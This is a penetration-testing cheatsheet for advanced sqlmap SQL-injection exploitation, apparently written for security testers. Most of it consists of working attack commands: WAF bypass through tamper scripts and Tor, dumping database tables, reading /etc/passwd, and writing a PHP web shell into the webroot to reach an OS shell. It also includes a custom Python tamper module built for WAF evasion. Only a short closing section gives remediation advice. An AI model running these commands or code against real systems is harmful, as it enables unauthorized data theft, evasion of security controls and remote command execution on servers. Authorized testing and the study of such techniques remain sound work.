Methodology Checklist
- Risk/level: sqlmap -u [URL] --level=5 --risk=3
- Tamper scripts for WAF bypass: --tamper=space2comment,randomcase
- Dump specific table: sqlmap -u [URL] -D [DB] -T [TABLE] --dump
- OS shell: sqlmap -u [URL] --os-shell
- File read: sqlmap -u [URL] --file-read=/etc/passwd
- File write: sqlmap -u [URL] --file-write=shell.php --file-dest=/var/www/html/shell.php
- Proxy through Burp: --proxy=http://127.0.0.1:8080
- Save/restore session: -s [FILE] (sqlmap keeps session state in a .sqlite file; the option is the short -s, there is no --session long form, and --output-dir controls where the default one is written)
Operational Context
Use when: basic SQLMap runs are insufficient: the target requires tamper scripts, custom headers, specific techniques, or WAF bypass to exploit an identified SQLi.
Think Dumber First: WAF blocking SQLMap? Try --tamper=space2comment,randomcase first. Then add --delay=2 --random-agent. Still blocked? Add --proxy=http://127.0.0.1:8080 to route through Burp and manually inspect which requests are being blocked and on what.
Skip when: the target cooperates with basic SQLMap. Don't add complexity you don't need.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sqlmap -u "http://[TARGET_IP]/?id=1" --level=5 --risk=3 | Max depth (8,000+ payloads); slow, use as a last resort |
| sqlmap -u "http://[TARGET_IP]/?q=test" --prefix="%'))" --suffix="-- -" | Manual boundary injection |
| sqlmap -u "http://[TARGET_IP]/?id=1" --technique=BEU | Only Boolean, Error and UNION (skips slow time-based) |
| sqlmap -u "http://[TARGET_IP]/?id=1" --union-cols=17 | Set exact UNION column count |
| sqlmap -u "http://[TARGET_IP]/?id=1" --union-char='a' | Replace NULL filler in UNION |
| sqlmap -u "http://[TARGET_IP]/?id=1" --union-from=users | Table for the FROM clause of UNION payloads (Oracle requires a FROM; sqlmap defaults to DUAL there, use this when that fails) |
| sqlmap -u "http://[TARGET_IP]/?id=1" --code=200 | Anchor TRUE detection to an HTTP status code |
| sqlmap -u "http://[TARGET_IP]/?id=1" --string=success | Anchor TRUE detection to a string in the HTML |
| sqlmap -u "http://[TARGET_IP]/?id=1" --text-only | Compare stripped text only (ignores dynamic HTML) |
| sqlmap -u "http://[TARGET_IP]/target.php" --data="id=1&t0ken=[TOKEN]" --csrf-token="t0ken" | Auto-fetch CSRF token per request |
| sqlmap -u "http://[TARGET_IP]/?id=1&uid=12345" --randomize=uid --batch | Randomize replay-prevention parameter |
| sqlmap -u "http://[TARGET_IP]/?id=1&h=[HASH]" --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()" | Recalculate dependent parameter per request (parameter values arrive as str, so encode before hashing on Python 3) |
| sqlmap -u "http://[TARGET_IP]/" --tor --check-tor | Route through Tor (SOCKS on 9050/9150) and verify the circuit first |
| sqlmap -u "http://[TARGET_IP]/" --chunked | Chunked transfer encoding for POST bodies (defeats some signature-based WAFs) |
| sqlmap -u "http://[TARGET_IP]/" --tamper=between,randomcase,space2comment | Apply tamper scripts |
| sqlmap -u "http://[TARGET_IP]/?id=1" --is-dba | Check DBA status before OS escalation |
| sqlmap -u "http://[TARGET_IP]/?id=1" --file-read "/etc/passwd" | Read remote OS file (saved under the output dir: ~/.local/share/sqlmap/output/[target]/files/ on current versions, ~/.sqlmap/output/ on old ones) |
| sqlmap -u "http://[TARGET_IP]/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" | Write local file to remote server |
| sqlmap -u "http://[TARGET_IP]/?id=1" --os-shell | Auto-upload stager + interactive OS shell |
| sqlmap -u "http://[TARGET_IP]/?id=1" --os-shell --technique=E | Restrict to error-based if --os-shell returns no command output |
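The --eval row above hides a Python 3 pitfall that silently kills the whole run: sqlmap binds each request parameter to a local name holding a str, so the Python-2-era snippet hashlib.md5(id) raises TypeError and no request ever carries a valid hash. The code below is an added example, not sqlmap's own code: apply_eval is a simplified model of what sqlmap does with an --eval snippet, written here so the failure and the fix can be reproduced stand-alone. The sample request and parameter names (id, h) are constructed.

```python
def apply_eval(eval_code: str, params: dict) -> dict:
    """Simplified model of sqlmap's --eval handling (assumption: not sqlmap's
    own code). Every request parameter becomes a local variable holding its
    value as a str, the snippet is executed, and the parameter values are
    read back so that changes made by the snippet reach the request."""
    namespace = {name: str(value) for name, value in params.items()}
    exec(eval_code, {}, namespace)
    # Only pre-existing parameters are updated; helper names created by the
    # snippet (such as the imported module) are dropped.
    return {name: str(namespace[name]) for name in params}


# Snippet copied from many Python-2-era cheatsheets: hashlib wants bytes,
# sqlmap hands over str, so this raises TypeError on every request.
BROKEN_EVAL = "import hashlib; h=hashlib.md5(id).hexdigest()"

# Corrected snippet: encode the str before hashing.
FIXED_EVAL = "import hashlib; h=hashlib.md5(id.encode()).hexdigest()"


def recalculate(params: dict) -> dict:
    """Return the request parameters with h recomputed from the (possibly
    injected) id value, as the server-side integrity check expects."""
    return apply_eval(FIXED_EVAL, params)


def broken_eval_fails(params: dict) -> bool:
    """True if the legacy snippet raises, which it does on Python 3."""
    try:
        apply_eval(BROKEN_EVAL, params)
    except TypeError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample request: id is the injectable parameter, h must
    # always equal md5(id) or the application rejects the request.
    request = {"id": "1", "h": "0000"}
    print(recalculate(request))
    print(recalculate({"id": "1 AND 1=1", "h": "0000"}))
    print("legacy snippet raises:", broken_eval_fails(request))
```

Because the hash is recomputed over whatever sqlmap put into id, every injected test payload arrives with a matching h, which is exactly what --eval is for; the same .encode() fix applies to sha1/sha256 variants of the snippet.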
Deep Dive & Workflow
Attack Tuning Decision Tree
```
SQLMap returning no results?
├── Try --level=5 --risk=3 (last resort: 8,000+ payloads, slow)
│   └── Risk 3 enables OR-based payloads (needed for login bypass, dangerous when the injection sits in an UPDATE/DELETE: OR 1=1 hits every row); risk 2 adds heavy time-based tests
├── Know the boundary? → --prefix="%'))" --suffix="-- -"
├── Detection confused by dynamic content? → --text-only or --string=known_text
└── Know column count? → --union-cols=N (skips auto-discovery)
```
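Why the "dynamic content" branch exists: boolean-based detection compares each response against a reference page, and a per-request nonce, hidden CSRF field or timestamp makes two TRUE pages differ even though the query outcome is identical. The code below is an added illustration, not sqlmap's comparison logic (sqlmap scores a similarity ratio rather than testing equality): looks_true models the precedence of --string, --code and --text-only over raw page comparison, and the sample pages are constructed to show where --text-only helps and where only --string does.

```python
import re
from html.parser import HTMLParser


class _TextExtractor(HTMLParser):
    """Collect visible text only; tags, attributes, <script> and <style>
    bodies are dropped, which is what --text-only comparison relies on."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def text_only(html: str) -> str:
    """Return the page's visible text with whitespace normalised."""
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    return re.sub(r"\s+", " ", " ".join(parser.parts)).strip()


def looks_true(reference, response, string=None, code=None, text_only_mode=False):
    """Classify `response` as a TRUE page relative to `reference`.
    Precedence mirrors the sqlmap options: --string and --code are explicit
    anchors and win; --text-only compares stripped text; otherwise the raw
    bodies are compared (simplified here to exact equality)."""
    if string is not None:
        return string in response["body"]
    if code is not None:
        return response["code"] == code
    if text_only_mode:
        return text_only(response["body"]) == text_only(reference["body"])
    return response["body"] == reference["body"]


def page(nonce, message, stamp=None):
    """Constructed sample page: a per-request nonce appears in a script and
    in a hidden field (both invisible to --text-only); `stamp` optionally
    adds a visible timestamp, which --text-only cannot filter out."""
    stamp_html = f'<div id="ts">{stamp}</div>' if stamp else ""
    return (f'<html><head><script>var nonce="{nonce}";</script></head><body>'
            f'<input type="hidden" name="csrf" value="{nonce}">'
            f"{stamp_html}<p>{message}</p></body></html>")


# Constructed responses for the decision tree above.
REF = {"code": 200, "body": page("a1b2", "Welcome back, admin")}
TRUE_RESP = {"code": 200, "body": page("9f8e", "Welcome back, admin")}
FALSE_RESP = {"code": 200, "body": page("7c7c", "No results")}
REF_STAMPED = {"code": 200, "body": page("1e1e", "Welcome back, admin", "10:00:00")}
TRUE_STAMPED = {"code": 200, "body": page("0d0d", "Welcome back, admin", "10:00:01")}


def demo():
    """Verdicts a practitioner would compare while tuning detection."""
    return {
        "raw_compare_true_page": looks_true(REF, TRUE_RESP),                                     # False: nonce differs
        "text_only_true_page": looks_true(REF, TRUE_RESP, text_only_mode=True),                  # True
        "text_only_false_page": looks_true(REF, FALSE_RESP, text_only_mode=True),                # False
        "text_only_with_timestamp": looks_true(REF_STAMPED, TRUE_STAMPED, text_only_mode=True),  # False
        "string_anchor_true": looks_true(REF_STAMPED, TRUE_STAMPED, string="Welcome back"),      # True
        "string_anchor_false": looks_true(REF_STAMPED, FALSE_RESP, string="Welcome back"),       # False
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:28} {verdict}")
```

The takeaway for tuning: --text-only fixes noise that lives in markup (nonces in scripts, hidden fields), but a visible timestamp still breaks it, and only an explicit anchor such as --string=known_text or --code=N is robust there.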
WAF/Protection Bypass
CSRF tokens:
```bash
# Token must be fetched fresh before each request
sqlmap -u "http://[TARGET_IP]/target.php" \
    --data="id=1&t0ken=abc123" \
    --csrf-token="t0ken"
# Verify: the token parameter name must match the HTML form field name EXACTLY.
# If the token is issued by a different page, add --csrf-url=[URL_TO_GET_TOKEN]
```
Dynamic parameters:
```bash
# Randomize a nonce/UID that must be unique per request
sqlmap -u "http://[TARGET_IP]/?id=1&uid=12345" --randomize=uid --batch
# Recalculate hash of another parameter (.encode() is required on Python 3, the value arrives as str)
sqlmap -u "http://[TARGET_IP]/?id=1&h=abc" \
    --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()"
```
Tamper Script Reference:
| Script | What it does |
|---|---|
| randomcase | SELECT → SeLeCt |
| space2comment | spaces → /**/ |
| between | > → NOT BETWEEN 0 AND #, = → BETWEEN # AND # |
| equaltolike | = → LIKE |
| base64encode | encodes entire payload (only useful where the application base64-decodes the parameter) |
| percentage | SELECT → %S%E%L%E%C%T (ASP only) |
| symboliclogical | AND/OR → && / \|\| |
| 0eunion | 1 UNION → 1e0UNION |
Combine: --tamper=between,randomcase,space2comment
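Tamper scripts are plain Python modules that sqlmap loads from its tamper/ directory (or from a path given to --tamper); each exposes dependencies() and a tamper(payload, **kwargs) function that returns the rewritten payload. The module below is an added example and not one of sqlmap's shipped scripts: it chains a space2comment-style and a randomcase-style transform in one file so the combined effect can be studied offline and the result fed to a WAF in a lab. Assumptions: an abbreviated keyword list instead of sqlmap's full table, single-quote string awareness only, and a fallback for the PRIORITY import so the file also runs outside sqlmap.

```python
import random
import re

try:  # inside sqlmap this import works; stand-alone it does not, so fall back
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    __priority__ = 0  # assumption: plain int stand-in for PRIORITY.NORMAL

# Assumption: abbreviated keyword list; sqlmap's own randomcase uses its full keyword table.
_KEYWORDS = re.compile(
    r"\b(SELECT|UNION|ALL|FROM|WHERE|AND|OR|NOT|NULL|ORDER|BY|LIKE|BETWEEN|"
    r"CASE|WHEN|THEN|ELSE|END|CONCAT|CHAR|SLEEP|WAITFOR|DELAY)\b",
    re.IGNORECASE,
)


def dependencies():
    """sqlmap calls this to print DBMS/requirement notes; nothing needed here."""
    pass


def space_to_comment(payload):
    """space2comment-style transform: every space outside a single-quoted
    string becomes an inline comment, so keyword-boundary signatures such as
    'UNION SELECT' no longer match. Spaces inside quotes are data and kept."""
    out, in_quote = [], False
    for ch in payload:
        if ch == "'":
            in_quote = not in_quote
        if ch == " " and not in_quote:
            out.append("/**/")
        else:
            out.append(ch)
    return "".join(out)


def random_case(payload, rng=random):
    """randomcase-style transform: flip each letter of a SQL keyword to a
    random case, defeating case-sensitive signatures. `rng` is injectable
    so the output can be made reproducible."""
    def mix(match):
        return "".join(c.lower() if rng.random() < 0.5 else c.upper() for c in match.group(0))
    return _KEYWORDS.sub(mix, payload)


def tamper(payload, **kwargs):
    """Entry point sqlmap invokes for every payload it sends. Spaces are
    replaced first, then keywords are re-cased; when chaining real scripts,
    remember that sqlmap orders them by their __priority__ value."""
    if not payload:
        return payload
    return random_case(space_to_comment(payload))


def tamper_seeded(payload, seed):
    """Reproducible variant for testing and for eyeballing output."""
    return random_case(space_to_comment(payload), rng=random.Random(seed))


if __name__ == "__main__":
    # Constructed payload in the shape sqlmap emits for a UNION test.
    sample = "1 UNION ALL SELECT NULL,'a b',NULL"
    print(tamper_seeded(sample, 7))
```

Drop the file into sqlmap's tamper/ directory (or pass its path) and it can be listed like any built-in script; the useful check before relying on a chain is to run the tampered string against the target DBMS in a lab, because comment and case tricks that one engine tolerates (MySQL) another rejects.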
OS Exploitation Chain
```bash
# 1. Verify DBA
sqlmap -u "http://[TARGET_IP]/?id=1" --is-dba
# 2. Read files
sqlmap -u "http://[TARGET_IP]/?id=1" --file-read "/etc/passwd"
# Output saved under the sqlmap output dir: ~/.local/share/sqlmap/output/[target]/files/ (older versions: ~/.sqlmap/output/)
# 3. Write web shell manually
#    Only works when the DBMS runs on the web server host and the DBMS user can write to the webroot
echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://[TARGET_IP]/?id=1" \
    --file-write "shell.php" \
    --file-dest "/var/www/html/shell.php"
# 4. Auto OS shell (run without --batch so you can specify web language and document root manually)
sqlmap -u "http://[TARGET_IP]/?id=1" --os-shell
# If no command output: --os-shell --technique=E
```
--batch trap with --os-shell: with --batch, sqlmap accepts its own defaults for the web application language (PHP) and document root (/var/www/html/). Those are wrong on IIS or custom layouts, so the stager upload fails. Run without --batch and answer the prompts manually.
secure_file_priv block (MySQL): if --file-write fails despite DBA privileges, check the server's secure_file_priv variable (sqlmap's --sql-query option can run the SELECT for you). An empty string means unrestricted, a directory path means file operations are confined to that directory, and NULL means they are disabled entirely. Pivot to dumping application credentials instead.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SQLMap blocked by WAF | Default user-agent and payloads flagged | Combine: --tamper=space2comment,randomcase --random-agent --delay=2 |
| Blind SQLi too slow | Time-based only | Try error-based first: --technique=E; or boolean-based --technique=B, both much faster than time-based |
| SQLMap misses injection point | Custom parameter or header | Specify: --data 'param=*' with * marking injection point; or --headers 'X-Custom: *' |
| CSRF token breaks SQLMap requests | Token changes per request | Use --csrf-token=[TOKEN_PARAM] --csrf-url=[URL_TO_GET_TOKEN] |
| SQLMap dumps too much noise | Default verbose | Add -v 0 for quiet; use --output-dir=/tmp/sqlmap_[TARGET] to organize output |
Reporting Trigger
Finding Title: WAF-Bypassed SQL Injection Enables Automated Database Extraction
Impact: SQL injection exploitation with WAF bypass confirms that perimeter security controls can be evaded with publicly available tamper scripts, undermining the security value of the WAF as a compensating control.
Root Cause: WAF implementing signature-based detection without behavioral analysis. SQLi-vulnerable parameter not remediated at the application layer, relying solely on WAF protection.
Recommendation: Fix SQL injection at the source with parameterized queries; a WAF is a defense layer, not a fix. Tune the WAF to detect encoded and tampered SQLi payloads. Implement behavioral anomaly detection in addition to signature matching.